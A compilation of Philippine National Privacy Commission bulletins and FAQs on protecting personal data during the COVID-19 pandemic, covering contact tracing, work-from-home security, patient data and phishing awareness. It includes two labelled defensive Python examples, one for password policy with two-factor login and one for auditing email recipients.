The DOH released on April 17 Department Memorandum No. 2020-0189: Updated Guidelines on Contact Tracing of Close Contacts of Confirmed Coronavirus Disease (COVID-19) Cases.
The memorandum contains provisions on how to properly conduct effective contact tracing while being mindful of data privacy and the rights of data subjects. It also establishes the Department of Health, through its Epidemiological Bureau, as the oversight body for all contact tracing activities (Sec. IIIA.1).
Everyone is expected to be guided by this memorandum when collecting personal data. The DOH memorandum also applies to other government agencies.
NPC issuances
The NPC has issued guidelines on the collection, use and disclosure of personal information during the pandemic. Collect what is necessary but disclose only to proper authorities. Likewise, companies and government agencies are mandated to implement appropriate and reasonable security measures always.
Data quality is vital to effective contact tracing. Inaccurate information undermines the overall aim of tracing, misdirects government efforts, and wastes human and other scarce resources.
We believe successful contact tracing can only happen when there’s mutual trust between public health authorities and the citizenry. The public must give accurate information for contact tracing to be effective. But for the public to respond, they must rely on authorities to balance the risks to their rights and security and the promised benefits to public health, with the assurance that their data is processed fairly, lawfully, and securely.
Rest assured that the NPC is closely coordinating with concerned agencies on matters concerning data privacy.
# # #
NPC PHE Bulletin No. 12: Protecting Personal Data in a Work From Home Arrangement
As the Philippines was placed under varying levels of community quarantine to address the COVID-19 pandemic, organizations in the government and private sector implemented a work from home (WFH) setup, which is a type of telecommuting. Republic Act 11165 or the Telecommuting Act defines telecommuting as a “work arrangement that allows an employee in the private sector to work from an alternative workplace with the use of telecommunications and/or computer technologies.”
Given the public health emergency that the country faces, the National Privacy Commission (NPC) supports the adoption of the WFH set up as a viable strategy to balance the need to preserve the health and well-being of an organization’s workforce with the need to continuously operate and provide services to the public.
WFH and other telecommuting modes are management options determined by the organization as part of its Business Continuity Plan, to keep organizational operations running and work continuously delivered in the face of events such as typhoons and public safety or public health emergencies.
This setup, however, is not risk-free. Unauthorized access to and improper disposal of documents containing personal data due to unprotected home devices and physical files are just some of the potential dangers that come with it.
Thus, the NPC advises organizations operating under a WFH setup and other modes of telecommuting to consider the following measures to ensure that the data privacy of data subjects remains protected.
These guidelines cover general security measures that organizations and individuals working on their own can take, not only during the pandemic but whenever a telecommuting arrangement is implemented.
GUIDELINES
Authorized Information Communication Technology (ICT) Assets. Organizations are responsible for making sure telecommuting employees are provided the proper ICT assets. In return, employees are accountable and responsible for the physical care of those assets.
- Computers and other ICT peripherals. Employers should issue their staff with appropriate ICT resources to adequately perform their duties.
Personal devices may be used if provision of organization-owned ICT resources is impractical. Such practice, however, must be governed by the organization’s Bring Your Own Devices (BYOD) policy.
- Removable Devices. Personnel are encouraged to use only organization-issued ICT peripherals (such as USB flash drives, USB mice, USB keyboards, etc.). When using portable media (such as disks or USB flash drives) to store or transfer data, data encryption must be ensured.
- Software. Only software authorized by the organization must be used, and only for official purposes. Avoid storing the organization’s digital files, including those with personal data, on external services and software.
- Proper configuration and security updates. Install security patches prior to and while WFH is enforced to prevent cyber security exploits and malicious damage, including the following:
- Automatic update & installation of operating system security patches
- Periodic scheduling & scanning of authorized antivirus software
- Automatic update, installation & configuration of web browser and its preferences
- Automatic update & installation of personal productivity software (e.g., word processor, spreadsheet, presentation software, etc.)
- Update and configuration of video conferencing software / platform
- Web Browser Hardening. Ensure that your browser is up to date & properly configured.
Below are the configurations for popular browsers.
| Measures | Chrome configuration | Firefox configuration | Edge configuration |
|---|---|---|---|
| Browse in private | Use Incognito Window and delete private data when exiting browser | Use Private Window and delete private data when exiting browser | Use InPrivate Window and delete private data when exiting browser |
| Disable autofill of passwords and information | In Settings, disable Autofill Passwords, Payment methods, Addresses and more | In the Privacy and Security tab, disable Ask to save login and passwords; enable Suggest and generate strong passwords | In Profiles, disable offer to save passwords and save and fill information |
| Prevent tracking | Enable "Do Not Track" request with your browsing traffic | Enable strict enhanced tracking protection; set to “Always” send websites a “Do Not Track” signal that you don’t want to be tracked | Enable Strict Tracking Prevention |
| Check password exposure in breaches | Warn you if passwords are exposed in a data breach | Show alerts about passwords for breached websites | Not applicable |
| Control permissions | Set all to “Ask before accessing” | Set all permissions to “Block” by default | Set all to “Ask first” |
- Video conferencing. If available, only use video conferencing platforms contracted by your organization, which should pass its privacy and security standards.
When availing of free platforms, use only an up-to-date version, one that offers adequate privacy & security features, and is properly configured:
- Set your meeting ‘private’ by default. Do not reveal meeting IDs in public domains
- Require meeting participants a password upon joining
- Make sure the meeting host is notified when people join and verifies identity of each
- Carefully control screen sharing & recording
- Keep cameras & microphones turned off, unless when speaking
- Avoid transferring files
Acceptable Use. Organizations must have an Acceptable Use Policy (AUP) that defines allowable personal uses of ICT assets. This may include:
- Personal emails
- Browsing of news and articles
- Social media/networking (can be defined in a separate organizational policy)
- Video streaming
While organization ICT assets should only be used for authorized purposes, the AUP must acknowledge that occasional personal use by employees may occur without adverse effect to the organization’s interests.
The AUP should also define unacceptable and unauthorized uses, which may include:
- Uses contrary to laws, customs, mores & ethical behavior
- Uses for personal benefit, entertainment, profit-oriented, partisan, or hostile activities.
- Uses that damage the integrity, reliability, confidentiality and efficiency of ICT resources
- Uses that violate the rights of other users
Access Control. Personnel access to organization data must only be on a “need-to-know-basis”, anchored on pre-defined user profiles and controlled via a systems management tool.
User Authentication. Require strong passwords to access personnel credentials and accounts. Passwords must be at least eight (8) characters long, comprising upper- and lower-case letters, numbers and symbols. Prohibit sharing of passwords. Set up multifactor authentication for all accounts so that a compromised password alone does not give a threat actor immediate control of the account.
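An added example, not from the bulletin, of the password rule and the second factor working together: the policy check mirrors the rule above, the one-time code is RFC 4226 HOTP / RFC 6238 TOTP built from the standard library, and the in-memory account store, usernames and the RFC test secret are constructed.

```python
"""Password policy plus a TOTP second factor (added example, not from the bulletin).

check_password_policy() mirrors the rule above (8+ characters, upper- and
lower-case letters, digits, symbols). The second factor is RFC 4226 HOTP /
RFC 6238 TOTP from the standard library, so a compromised password alone
does not log anyone in. The account store is constructed and the RFC test
secret "12345678901234567890" is used so the codes are checkable.
"""
import hashlib
import hmac
import os
import string
import struct
import time
from typing import Dict, List, Optional

PBKDF2_ROUNDS = 200_000
ACCOUNTS: Dict[str, dict] = {}    # constructed in-memory store: username -> record


def check_password_policy(pw: str) -> List[str]:
    """Return the rules the password violates; an empty list means compliant."""
    problems = []
    if len(pw) < 8:
        problems.append("shorter than 8 characters")
    if not any(c.isupper() for c in pw):
        problems.append("no upper-case letter")
    if not any(c.islower() for c in pw):
        problems.append("no lower-case letter")
    if not any(c.isdigit() for c in pw):
        problems.append("no digit")
    if not any(c in string.punctuation for c in pw):
        problems.append("no symbol")
    return problems


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226: HMAC-SHA1 over the 8-byte big-endian counter, then dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, at: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238: HOTP with counter = floor(unix_time / step)."""
    return hotp(secret, at // step, digits)


def verify_totp(secret: bytes, code: str, at: int, step: int = 30, window: int = 1) -> bool:
    """Accept the current step and +/- `window` neighbours to absorb clock drift."""
    return any(hmac.compare_digest(totp(secret, at + k * step, step), code)
               for k in range(-window, window + 1))


def enroll(username: str, password: str, totp_secret: bytes) -> List[str]:
    """Reject policy-violating passwords; store only a salted PBKDF2 hash."""
    problems = check_password_policy(password)
    if problems:
        return problems
    salt = os.urandom(16)
    ACCOUNTS[username] = {
        "salt": salt,
        "hash": hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS),
        "totp_secret": totp_secret,
    }
    return []


def login(username: str, password: str, code: str, at: Optional[int] = None) -> bool:
    """Both factors must verify: a stolen password without the device's code fails."""
    acct = ACCOUNTS.get(username)
    if acct is None:
        return False
    at = int(time.time()) if at is None else at
    h = hashlib.pbkdf2_hmac("sha256", password.encode(), acct["salt"], PBKDF2_ROUNDS)
    password_ok = hmac.compare_digest(h, acct["hash"])
    code_ok = verify_totp(acct["totp_secret"], code, at)
    return password_ok and code_ok   # both evaluated, so the result does not reveal which failed


if __name__ == "__main__":
    rfc_secret = b"12345678901234567890"   # RFC 4226/6238 test-vector secret
    print(enroll("wfh-user", "Wfh-2020!", rfc_secret))                     # [] -> enrolled
    print(login("wfh-user", "Wfh-2020!", totp(rfc_secret, int(time.time()))))  # True
    print(login("wfh-user", "Wfh-2020!", "000000"))  # False: the password alone is not enough
```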
Network Security. When organization ICT assets are connected to personal hotspots and/or home Wi-Fi networks, observe the following:
- Don’t visit malicious webpages. Always look for the “https” prefix in the URL to ensure the connection is encrypted. Also, inspect the site’s certificate manually to validate the owner’s identity.
- As much as possible, ensure high availability and reliability of the internet connection.
- Configure the Wi-Fi modem or router. Review and configure the following:
  - Currently connected devices;
  - Encryption/Security: Wi-Fi Protected Access 2 (WPA2) with Advanced Encryption Standard (AES) and a strong password.
- Avoid connecting office computers to public networks, such as coffee shop Wi-Fi. If left with no choice, use a reliable Virtual Private Network (VPN) when connecting.
Records and File Security. Set up policies to ensure sensitive data is processed in a protected and confidential manner to prevent unauthorized access, including:
- A records management policy
- A policy against posting sensitive documents in unauthorized channels, such as social media sites
- A policy imposing the use of a file’s digital version instead of physical records, whenever possible
- A retention policy for processing sensitive data in personal devices.
Emails. When transferring sensitive data via email, encrypt the files and attachments. Also, ensure that personnel always use the “TO, CC and BCC” fields properly, to avoid sending to wrong recipients or needlessly exposing other people’s email addresses to all recipients.
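The recipient-field rule is easy to state and easy to get wrong under time pressure, so it is worth checking a draft before it goes out. Below is an added example (not code from the NPC or this guidance) that audits the TO/CC/BCC split of a draft: it flags malformed and duplicated addresses, and when more than a configurable number of external addresses sit in the visible fields it proposes a version with those addresses moved to BCC. The sender domain `example.org`, the partner domains and the threshold are constructed assumptions of the example.

```python
from email.utils import parseaddr


def _bare(addr: str) -> str:
    """'Jane Doe <jane@example.org>' -> 'jane@example.org' (lower-cased)."""
    return parseaddr(addr)[1].lower()


def _domain(addr: str) -> str:
    """Domain part of an address, or '' when the address has no '@'."""
    bare = _bare(addr)
    return bare.rsplit("@", 1)[1] if "@" in bare else ""


def audit_recipients(sender, to, cc, bcc, max_visible_external=1):
    """Audit a draft's TO/CC/BCC split before sending.

    Returns (warnings, suggested): a list of human-readable findings and a
    {"to", "cc", "bcc"} dict in which external addresses beyond
    `max_visible_external` have been moved from the visible fields to BCC,
    so that recipients do not see each other's addresses.
    """
    own = _domain(sender)
    warnings = []
    suggested = {"to": list(to), "cc": list(cc), "bcc": list(bcc)}

    # 1. Malformed or duplicated addresses are the usual cause of mail going
    #    to the wrong place; flag them in every field.
    seen = set()
    for field in ("to", "cc", "bcc"):
        for addr in suggested[field]:
            bare = _bare(addr)
            if "@" not in bare:
                warnings.append(f"malformed address {addr!r} in {field.upper()}")
            elif bare in seen:
                warnings.append(f"duplicate recipient {bare} in {field.upper()}")
            seen.add(bare)

    # 2. External addresses in TO/CC are disclosed to everyone on the mail.
    external = [a for f in ("to", "cc") for a in suggested[f] if _domain(a) != own]
    if len(external) > max_visible_external:
        warnings.append(
            f"{len(external)} external addresses are visible to all recipients; "
            "move them to BCC"
        )
        suggested["to"] = [a for a in to if _domain(a) == own]
        suggested["cc"] = [a for a in cc if _domain(a) == own]
        suggested["bcc"] = list(bcc) + external
        if not suggested["to"]:
            # Mail clients need at least one visible recipient; use the sender.
            suggested["to"] = [sender]
    return warnings, suggested


if __name__ == "__main__":
    # Constructed draft: one internal recipient, two partner organizations in CC.
    found, fixed = audit_recipients(
        "dpo@example.org",
        ["alice@example.org"],
        ["bob@partner-a.test", "carol@partner-b.test"],
        [],
    )
    print(found)
    print(fixed)
```

The threshold of one visible external address is a judgement call: a reply to a single outside contact is normal, while a circular to several partner organizations is exactly the case where addresses leak. The check treats the sender's own domain as internal; an organization with several mail domains would pass an allowlist instead.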
Physical security. Create workspaces in private areas of the home, or angle work computers in a way that minimizes unauthorized or accidental viewing by others.
- Lock away work devices and physical files in secure storage when not in use. Should there be a need to print documents, the personnel must ensure that physical and digital documents are properly handled and disposed of – in accordance with office policy.
- Never leave physical documents with sensitive data just lying around, nor use them as a “scratch paper”.
Security Incident Management. Personnel must immediately notify their immediate supervisor in case of a potential or actual personal data breach while working from home. The organization’s Data Protection Officer and/or Data Breach Response Team should immediately be alerted.
For further guidance, please review the NPC Circular on Personal Data Breach Management.
RAYMUND ENRIQUEZ LIBORO
Privacy Commissioner
NPC PHE Bulletin No. 11: Joint Statement of the Department of Health (DOH) and National Privacy Commission (NPC) on Processing and Disclosure of COVID-19 Related Data
This joint statement is issued by the Department of Health and the National Privacy Commission in response to concerns raised by various stakeholders on the processing and disclosure of COVID-19 patient data, including those of COVID-19 suspect, probable, or confirmed patients.
We uphold the Republic Act No. 11332 or the Mandatory Reporting of Notifiable Diseases and Health Events of Public Health Concern Act and the Data Privacy Act of 2012 in processing COVID-19 patient data in pursuit of disease surveillance and response.
As we call on all COVID-19 patients to truthfully and accurately disclose their personal data to proper authorities to help fight this pandemic, the DOH guarantees that the data privacy rights of these patients are protected. The DOH and NPC stand firm against any form of unbridled disclosure of patients’ personal data to the public that has been proven to cause a real risk of severe harm to patients.
We reiterate our appeal to all COVID-19 suspect, probable, and confirmed patients. Your honesty and cooperation will allow our front liners to adopt appropriate measures to protect themselves.
Rest assured that the DOH only discloses these data to public health authorities and concerned health care providers for purposes of contact tracing and management of the disease. These personally-identifiable data may also be disclosed to other government entities authorized based on DOH guidelines.
In these instances, public health authorities, concerned health care providers, and other government entities who are custodians of patients’ personal data have the legal obligation to protect the data privacy rights of these patients and ensure the confidentiality, integrity, and availability of their personal data.
We also remind public health authorities, concerned health care providers, and other government entities to ensure and protect the privacy of COVID-19 patient data and the data privacy rights of the patients. This way, we can help allay the fears of patients on COVID-related physical assaults, harassments, and discrimination, and encourage them to report their symptoms, take confirmatory tests, and submit themselves to treatments by proper authorities.
Fostering mutual trust and protection between patients and authorities is an indispensable part of our fight to defeat the COVID-19 pandemic.
NPC PHE Bulletin No. 10: Protection Against Unauthorized Disclosure of Patient Data
In recent weeks, the National Privacy Commission (NPC) has received breach notifications concerning the possible unauthorized disclosure of sensitive personal information of suspected, probable, and confirmed COVID-19 patients. The NPC is currently investigating these incidents in accordance with the Data Privacy Act.
To prevent incidents of unauthorized processing from spreading, the NPC calls on institutions providing health services, and on their Data Protection Officers, to strengthen the protection of patients’ personal data. Let us remember that trust between patients, health institutions, and the government is vital in curbing the COVID-19 pandemic.
Patients will provide the true and complete details that the authorities need if they are confident that their sensitive data will be used only for treatment, surveillance, and response to the COVID-19 pandemic, and handled with full care, so that it is not disclosed to others or used in a way that would only cause stigma, such as discrimination, harassment, and physical assault.
Here are steps to strengthen the organizational, physical, and technical security measures for safeguarding your patients’ data, to avoid unauthorized disclosure:
- Always remind your officials and employees that protecting patients’ personal data is a legal and moral responsibility. Use practical methods, such as putting up posters or distributing printouts. Remind them that, as custodians of the data, it is their obligation to ensure its confidentiality, integrity, and availability.
Emphasize that unauthorized disclosure of data is prohibited by law, particularly under Republic Act No. 11332 or the Mandatory Reporting of Notifiable Diseases and Health Events of Public Health Concern Act, and the DPA. Also remind them that they have signed a non-disclosure agreement in this regard.
- Establish “access control” for patient data based on “least privilege”. Limit who can access patient data according to need. That is, give an employee only enough access to perform their duties, and only for as long as it is needed.
- Install locks, alarms, and other physical security equipment. Make sure your facility cannot simply be entered by unauthorized individuals. When not in use, documents containing patient data should be locked in a cabinet or room.
- Give patient data only to the proper authorities, and discuss it only in private places. Avoid discussing a patient’s personal details in public places, except in an emergency. When speaking by telephone, first confirm the identity of the person on the other end of the line and whether they are authorized to receive information about the patient.
- Put privacy screens on your computers so that unauthorized individuals cannot glimpse the information on the screen. If there is no privacy screen, position computer monitors in a secluded cubicle or angle them so they are not easily seen. Also make sure that computers and laptops are password-protected.
- Make sure your portable storage media (such as USB flash drives and external hard drives) containing patient data are encrypted and password-protected. Keep them in a locked cabinet when not in use, and make sure they are not left scattered on desks, counters, in conference rooms, and other common areas.
- Make sure electronic files or digital copies of patient data are encrypted.
- Make sure the digital platform used to communicate with your team or patients is secure. Encrypt documents or files sent over the internet. Use passwords that are hard to guess, and also use second-factor authentication when logging into accounts.
RAYMUND ENRIQUEZ LIBORO
Privacy Commissioner
NPC PHE BULLETIN No. 10: Protecting Patient Data from Unauthorized Disclosure
In recent weeks, the National Privacy Commission (NPC) has received several breach notifications which involve the possible unauthorized disclosure of sensitive personal information of suspect, probable and confirmed COVID-19 patients. The NPC is now looking into said breach incidents, in accordance with our internal procedures and in collaboration with concerned Personal Information Controllers (PICs), for remediation and other purposes within the bounds of the Data Privacy Act of 2012.
With a view to preventing unauthorized disclosure from happening, we call on health institutions and their Data Protection Officers (DPOs) to strengthen the protection of patient data. After all, fostering mutual trust and protection between patients, health institutions and authorities is crucial in dealing with the COVID-19 pandemic.
Patients will only fully and truthfully disclose the needed information to authorities if they feel assured that the information will be properly used for treatment, disease surveillance and response, and will be protected against any type of misuse, such as unauthorized disclosure, which has proven to result in stigma-driven physical assaults, harassments, and acts of discrimination.
Below are some of the organizational, physical and technical security measures that health institutions and their staff may enforce to protect patient data against unauthorized disclosure:
- Regularly remind officials and employees of their ethical and legal duty to protect patient data.
This reminder may come in the form of strategically located posters or print outs informing every one of their responsibility to protect the confidentiality, integrity and availability of patient data, which they have been entrusted with. Health institutions may want to emphasize that unauthorized disclosure is a prohibited act, both under Republic Act No. 11332 or the Mandatory Reporting of Notifiable Diseases and Health Events of Public Health Concern Act, and the Data Privacy Act of 2012. They should ensure that non-disclosure agreements and related contracts are in place and enforced.
- Establish access control for patient data based on least privileges.
Only provide access on a “need-to-know” basis. This means that health personnel are allowed only the minimum and necessary access to enable the performance of their functions.
- Equip facilities with physical access controls.
Protect physical access to facilities through locks and alarms. This is to ensure that only authorized personnel have access to facilities that house the systems and the data. At the same time, keep documents containing patient data in locked cabinets or secure rooms when not in use.
- Only disclose patient data to proper authorities and in appropriate areas.
Refrain from discussing patient data in public areas where unauthorized parties may pick up personal data, unless when providing treatment under compelling circumstances. In addition, when discussing over the phone, confirm the identity of the person first and check whether he or she is authorized to receive such information.
- Protect the computer display from unauthorized or accidental viewing.
Prevent the accidental viewing and disclosure of data through the use of privacy screens. If a privacy screen is not readily available or practical, place computer monitors inside secluded cubicles or angle them in such a way that minimizes the chance of any unauthorized or accidental viewing by unauthorized individuals. Computers must be locked with a password whenever the authorized user leaves the workstation.
- Lock storage media away when not in use.
If the use of portable storage media (such as USB flash drives or external hard drives) to store patient data is unavoidable, ensure that the files are encrypted and password protected. Also, make sure they are kept secure on your person when working in public places and not left absentmindedly on desks, counters, in conference rooms, and other common areas where they may be accessed by unauthorized individuals.
- Ensure that patient data are encrypted, both in-transit and at rest.
Electronic copies of patient data must be protected to the same extent that physical files and storage media containing patient data are secured. Encrypting patient data both in-transit and at rest ensures that the files are locked and only accessible to authorized persons.
- Communicate securely.
Choose a secure platform for care team collaboration and patient communication. For further protection, ensure that the documents are encrypted with a password of sufficient strength. The password must be sent via a separate channel like SMS/text. It is likewise advised that apart from setting a strong password, a second-factor authenticator may be used whenever logging into accounts.
RAYMUND ENRIQUEZ LIBORO
Privacy Commissioner
NPC PHE BULLETIN No. 9: NPC Supports DILG’s bid vs discrimination of COVID-19 frontliners
- The National Privacy Commission supports the call of the Department of the Interior and Local Government on local government units to enact ordinances to safeguard COVID-19 frontline workers against acts of discrimination.
- Being a communicable disease, COVID-19 carries with it a stigma that brings out the worst in others. This stigma affects not just patients but also frontliners --- health professionals and hospital workers, police, military, and essential services personnel --- people who have put so much of themselves into the nation’s fight to contain the pandemic.
- Despite the services and sacrifices frontliners contributed to defend the rest of us against the pandemic, they often find themselves battling harassment, discrimination, and even violence from people who may be acting misguidedly out of dread or distress.
- Some frontliners even had their personal data shared in public, without their consent, thus exposing them to potential cyber-bullying, and causing them added stress and mental strain.
- Any form of discrimination against frontliners is downright wrong and must be penalized.
- Such discriminatory acts only disrupt the delivery of the most critical and valuable services our country needs right now.
- We need to act immediately to defend frontliners against discrimination, or risk losing the gains we achieved in this collective fight to beat the COVID-19 crisis.
RAYMUND ENRIQUEZ LIBORO
Privacy Commissioner
NPC PHE BULLETIN No. 8: On COVID-19-related apps, digital tools and solutions in this time of pandemic
- The National Privacy Commission (NPC) supports the successful use of digital technologies and the processing of personal data to enable health authorities to contain the COVID-19 pandemic, in a manner that is effective and preserves and protects the data privacy rights of individuals.
- For COVID-19-related apps to be successful, they must be inclusive and trusted. Therefore, efforts should be geared not only towards rapid deployment but also towards ensuring that the widest segment of the population, with their devices, can avail of these apps and that data quality is achieved. To be effective, such solutions must be trustworthy and acceptable for individual users to use with confidence, so that users will share information without fear of misuse or discrimination.
- COVID-19-related apps can only achieve the desired level of uptake if they are clear about their legitimate purpose, transparent on how they use personal data, and proportional in their collection. The app must not over-collect personal information from users; it must collect only what is necessary for the purpose.
- From the design stage, personal information controllers (PICs) must make sure that the app is solidly built on a legitimate purpose – making sure that it is limited to and consistent with the objective of helping defeat the COVID-19 pandemic. Thus, the app’s design, functionalities, personal data collection and extent of processing must never deviate from this purpose. Once the purpose is achieved, personal data processing must stop, while the collected and generated personal data must be disposed or discarded in a secure manner to prevent any further use. In doing so, breach-related privacy risks are minimized, thus enabling user trust and adoption by the general public.
- The personal data to be collected and the manner of processing must be moderated with the principle of proportionality. This means PICs must collect only the minimum data necessary to achieve the declared and specific purpose, using the least intrusive method.
- PICs must also ensure transparency by telling individual users, through an easy-to-understand privacy notice, how the app or digital solution will collect, use, store, and dispose of their personal data. Users must also be made aware to whom, if anyone, their personal data shall be disclosed incidental to the processing.
- Considering the inherent vulnerability of personal data processing over the internet and in anticipation of the latest cyber threats, PICs must also ensure that appropriate security measures are identified and implemented. PICs are also expected to inform users of their data subject rights and incorporate mechanisms to easily exercise them.
RAYMUND ENRIQUEZ LIBORO
Privacy Commissioner
NPC PHE BULLETIN No. 6: Collect the minimum necessary information in providing financial aid and other relief packages to those affected by the enhanced community quarantine
The National Privacy Commission (NPC) supports efforts by the national government to provide much-needed assistance to our people in these extraordinary times.
We remind all government offices, including local government units, to further ease the people’s burden by exercising proportionality and collecting less of their data to facilitate such assistance.
Collect only necessary personal details, such as those required according to usual accounting, auditing, and budgeting rules and regulations when disbursing public funds, as well as other applicable laws and regulations.
Avoid burdening recipients with personal data requirements that are beyond the minimum necessary, which would only impede the speedy flow of aid distribution in this time of urgency.
All collected personal data must be safeguarded to prevent any unauthorized access and use. Appropriate retention and disposal policies should also be in place. Collect to meet present objectives and discard any notion of possible future use of the data.
On the part of employers, obtaining consent from the affected workers is not required under the present emergency when submitting requirements to government regulatory agencies mandated to distribute aid to these workers.
It is during these trying times that the data protection officers of companies are needed to provide timely and sensible advice to their management, considering all attendant circumstances and mindful of the rights and interests of the affected workers.
NPC remains committed to working with all agencies tasked in distributing aid to provide additional guidance and inputs, as may be necessary and appropriate.
For further guidance, we may be reached at [email protected].
RAYMUND ENRIQUEZ LIBORO
Privacy Commissioner
NPC PHE BULLETIN No. 3: Proper Handling of Personal Information Used to Combat the COVID-19 Pandemic
NPC PHE BULLETIN No. 4: Protecting personal data in the time of COVID-19
A growing number of online fraudsters are exploiting the public fear surrounding COVID-19, using the pandemic to lure people into clicking phishing emails and installing malware capable of stealing personal data and money.
Our fear during a crisis can expose us to data privacy risks, predisposing us to make hasty or ill-informed choices online, which fraudsters are taking advantage of.
In view of these heightened risks, the National Privacy Commission is appealing to everybody to be very careful online, especially when using online financial services and accessing health-related apps. Be cautious with the sites you visit, enhance your privacy settings, and protect your personal data.
In this period of home quarantine, digital access becomes our main gateway not just for news but also to coordinate tasks with co-workers, make online financial transactions and most importantly, get in touch with loved ones.
Indeed, now is the worst possible time to fall victim to online fraudsters. They can steal your sensitive data, cause you financial and reputational damages, make your device unusable and cut you off from the outside world.
To avoid such scenarios, we need to be vigilant and familiarize ourselves with the warning signs.
The National Privacy Commission encourages everyone to practice the following tips to protect personal data in the time of COVID-19:
- Do not give out your personal data in suspicious COVID-themed emails and messages. Is the email or message unsolicited? Does it urgently encourage you to open the attached file? Is it promising COVID vaccines or a cure that you have not heard of at all in the news or on credible websites? Do not click them. It is most likely a phishing attack that steals your financial data such as credit card or online banking details.
- Make trusted government and other legitimate websites your go-to source for the latest COVID information. We have a lot of questions about the pandemic. We will not find these answers, however, on some random websites or applications. What we may find on these sites instead are suspicious links, pop-ups and downloadable files, resulting in a ransomware infection that locks us out of our devices. Not only do you protect yourself from ransomware by relying on trusted sources, you also get to avoid misinformation.
- Ensure that the charity or crowdfunding campaign you plan to donate to is legitimate. Research online or through the social media contacts from whom you learned of the charity or crowdfunding campaign. Know where your donations will go. Think twice if the charity rushes or pressures you or makes unrealistic promises just to get you to donate. If you’ve decided to make the donation, be sure to check your bank statements and see if you’ve been charged the right amount.
- Be mindful of phishing baits from online scammers. Scammers want you to click on a link or give your password, account number and other personal information. This way they can steal your identity and money and gain access to your computer or cellphone. To do this, they use familiar company names or pretend to be someone you know. They pressure you to act now or else.
When you receive such messages, be skeptical. Look up the website or phone number of the company or person contacting you. Call them directly using the company’s official number or email. Never give any personal information, especially your password and PIN number.
Most phishing attempts use bad grammar and spelling. There are some, however, that look legitimate and very convincing.
During this critical period, all our focus and efforts should go to the fight against the spread of the COVID-19 virus. We should avoid, at all cost, getting sidetracked by these digital pitfalls.
In case you feel that your personal data have been compromised, please feel free to contact our complaints and investigation team. You may email us at [email protected] and [email protected].
RAYMUND ENRIQUEZ LIBORO
Privacy Commissioner
NPC PHE BULLETIN No. 3: Collect what is necessary. Disclose only to the proper authority.
Data protection in times of Emergency
The National Privacy Commission recognizes the extraordinary challenges our nation is facing due to this unfamiliar global pandemic. We all share the same concern and the urgent need to contain the spread of the virus. To win this battle against COVID-19, trusted and verified information is vital. Thus, during this time, it is not only the “misuse” of data that concerns us but also the “missed” use that could have made a difference in containing the disease.
Data protection and privacy should not hinder the government from collecting, using, and sharing personal information during this time of public health emergency. Neither does the law limit public health authorities from using available technology and databases to stop the spread of the virus. The principles contained in the law allow the use of data to treat patients, prevent imminent threats, and protect the country’s public health and still provide the level of protection the citizens expect. The Data Privacy Act of 2012 is an enabler in critical times like this.
We will continue issuing guidance to support our health practitioners and government units to properly and effectively use personal data to ensure the safety and security of everyone. For our front-liners: “To be able to communicate directly with the public, the medical and scientific community, and other government bodies. To coordinate nationally and globally”.
The following FAQs have been collated by our NPC staff to answer questions raised by government agencies, private companies, and the public. We will try our best to continue to respond to your queries in the days ahead.
The direction is lawful and straightforward. COLLECT WHAT IS NECESSARY. DISCLOSE ONLY TO THE PROPER AUTHORITY.
The power of data in responding to this global public health emergency cannot be overstated. The NPC is fully ready to help facilitate the safe and rapid flow of data to fight COVID-19.
RAYMUND ENRIQUEZ LIBORO
Privacy Commissioner
FAQs
Questions raised by stakeholders on the processing of personal data concerning the state of public health emergency (PHE) and the COVID-2019 response:
On monitoring of persons entering offices/buildings
1. Can we collect the details (name, contact details, and travel history) of all persons who will be entering our building through a form as may be required by a Department of Health (DOH) circular?
Yes, the building or office administrators may collect such personal data but only as may be necessary with what is required by the DOH.
2. Will the mere filling out and signing of such form amount to the consent required by the Data Privacy Act of 2012 (DPA)?
The basis of the processing of data in this scenario is not consent. Its lawfulness rests on the mandate of the Department of Health, given the declaration of the state of public health emergency in response to the COVID-19 pandemic.
It is advisable, though, to provide a privacy notice informing the visitors of the purpose and basis of the collection of such personal data. Once collected, reasonable and appropriate safeguards must ensure the security of the forms and personal data contained therein.
3. What are the specific data elements that we should collect from guests/visitors?
The specific data elements to be collected should be coordinated with the DOH as these would depend on what the latter needs to facilitate contact tracing.
Further information is available at the DOH website: https://www.doh.gov.ph/2019-nCov/interim-guidelines, and specifically for contact tracing: https://www.doh.gov.ph/sites/default/files/health-update/DC2020-0048-Reiteration-of-DM2020-0068-Interim-Guidelines-on-Contact-Tracing-for-Confirmed-2019-nCoV-ARD-Cases.pdf
On employees: collection of personal data
4. Can an employer ask its employees to submit declaration forms that provide personal data – for instance, whether they have traveled to or been in close contact with persons who have gone to regions affected by COVID-19, whether they are experiencing symptoms, etc.?
Yes, employers may collect such personal data. The National Privacy Commission (NPC) reminds all employers to collect what is only necessary, observing the general data privacy principle of proportionality. Once collected, reasonable and appropriate safeguards should ensure the security of the forms and personal data contained therein.
5. What are the specific data elements that an employer should collect?
The specific data elements to be collected should be coordinated with the DOH as these would depend on what the latter needs to facilitate contact tracing.
Further information is available at the DOH website: https://www.doh.gov.ph/2019-nCov/interim-guidelines, and specifically for contact tracing: https://www.doh.gov.ph/sites/default/files/health-update/DC2020-0048-Reiteration-of-DM2020-0068-Interim-Guidelines-on-Contact-Tracing-for-Confirmed-2019-nCoV-ARD-Cases.pdf
6. Can the employer disclose the personal data collected from employees to third parties?
Disclosure of employee data in this scenario should be limited to the DOH and other appropriate government agencies and following all existing protocols on the matter.
7. Should we ask our employees to sign a consent form or waiver that their information will be shared with the DOH if needed or requested?
Since the basis for the disclosure is not consent, then no consent form is needed. Instead, a privacy notice should be put in place informing employees of the purpose of collection.
On contact tracing: persons under investigation
8. Does an employer need to ask for the consent of an employee who is a person under investigation (PUI) for COVID-19 when disclosing the PUI’s data to the person/s that such PUI has had contact with during the time of suspected infection?
Contact tracing should be done only upon the authority, guidance, and instruction of the DOH.
See the DOH Interim Guidelines on Contact Tracing available here at this link: https://www.doh.gov.ph/sites/default/files/health-update/DC2020-0048-Reiteration-of-DM2020-0068-Interim-Guidelines-on-Contact-Tracing-for-Confirmed-2019-nCoV-ARD-Cases.pdf
